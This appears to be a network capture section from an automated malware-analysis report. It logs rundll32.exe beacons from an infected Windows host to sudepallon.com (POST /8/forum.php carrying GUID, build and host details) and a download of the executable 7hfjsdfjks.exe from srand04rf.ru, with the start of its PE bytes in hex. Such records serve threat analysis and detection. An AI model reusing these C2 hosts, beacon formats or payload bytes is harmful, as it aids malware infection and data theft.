                                        124192.168.2.224928977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        125192.168.2.224929077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        126192.168.2.224929177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        127192.168.2.224929277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        128192.168.2.224929377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        129192.168.2.224929477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        13192.168.2.224917977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:46.672894955 CEST308OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:46.738626003 CEST309INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:48 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cFMNUARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        130192.168.2.224929577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        131192.168.2.224929677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        132192.168.2.224929777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        133192.168.2.224929877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        134192.168.2.224929977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        135192.168.2.224930077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        136192.168.2.224930177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        137192.168.2.224930277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        138192.168.2.224930377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        139192.168.2.224930477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1495.213.179.6780192.168.2.2249178C:\Windows\SysWOW64\svchost.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        140192.168.2.224930577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        141192.168.2.224930677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        142192.168.2.224930777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        143192.168.2.224930877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        144192.168.2.224930977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        145192.168.2.224931077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        146192.168.2.224931177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        147192.168.2.224931277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        148192.168.2.224931377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        149192.168.2.224931477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        15192.168.2.224918077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:47.026523113 CEST311OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:47.093946934 CEST311INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:48 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4b 43 58 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cKCXPARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        150192.168.2.224931577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        151192.168.2.224931677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        152192.168.2.224931777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        153192.168.2.224931877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        154192.168.2.224931977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        155192.168.2.224932077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        156192.168.2.224932177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        157192.168.2.224932277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        158192.168.2.224932377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        159192.168.2.224932477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        16192.168.2.224918177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:47.375097036 CEST312OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:47.445048094 CEST312INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cGYBTARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        160192.168.2.224932577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        161192.168.2.224932677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        162192.168.2.224932777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        163192.168.2.224932877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        164192.168.2.224932977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        165192.168.2.224933077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        166192.168.2.224933177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        167192.168.2.224933277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        168192.168.2.224933377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        169192.168.2.224933477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        17192.168.2.224918277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:47.732880116 CEST313OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:47.801647902 CEST313INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMYBNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        170192.168.2.224933577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        171192.168.2.224933677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        172192.168.2.224933777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        173192.168.2.224933877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        174192.168.2.224933977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        175192.168.2.224934077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        176192.168.2.224934177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        177192.168.2.224934277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        178192.168.2.224934377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        179192.168.2.224934477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        18192.168.2.224918377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:48.095032930 CEST314OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:48.165807009 CEST314INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 51 4d 4e 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cQMNJARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        180192.168.2.224934577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        181192.168.2.224934677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        182192.168.2.224934777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        183192.168.2.224934877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        184192.168.2.224934977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        185192.168.2.224935077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        186192.168.2.224935177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        187192.168.2.224935277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        188192.168.2.224935377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        189192.168.2.224935477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        19192.168.2.224918477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:48.451046944 CEST315OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:48.518409014 CEST315INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:50 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 56 45 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJVEQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        190192.168.2.224935577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        191192.168.2.224935677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        192192.168.2.224935777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        193192.168.2.224935877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        194192.168.2.224935977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        195192.168.2.224936077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        196192.168.2.224936177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        197192.168.2.224936277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        198192.168.2.224936377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        199192.168.2.224936477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.22491678.211.241.080C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:42.683511972 CEST2OUTGET /7hfjsdfjks.exe HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: srand04rf.ru
                                        Cache-Control: no-cache
                                        Jul 9, 2021 03:07:42.873905897 CEST3INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 09 Jul 2021 01:07:42 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 272910
                                        Connection: keep-alive
                                        Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
                                        ETag: "60c0e5a8-42a0e"
                                        Accept-Ranges: bytes
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 c3 8d b4 26 00 00 00 00 8d bc 27 00 00 00 00 83 ec 1c 31 c0 66 81 3d 00 00 40 00 4d 5a c7 05 ec 43 44 00 01 00 00 00 c7 05 e8 43 44 00 01 00 00 00 c7 05 e4 43 44 00 01 00 00 00 c7 05 80
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*/P&`@ PdR.textDOP`P`.data8`T@@.rdata-p.V@@@/4@0@.bss@@`.idataP@0.CRT8`&@0.tlsp(@0&'1f=@MZCDCDCD


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        20192.168.2.224918577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
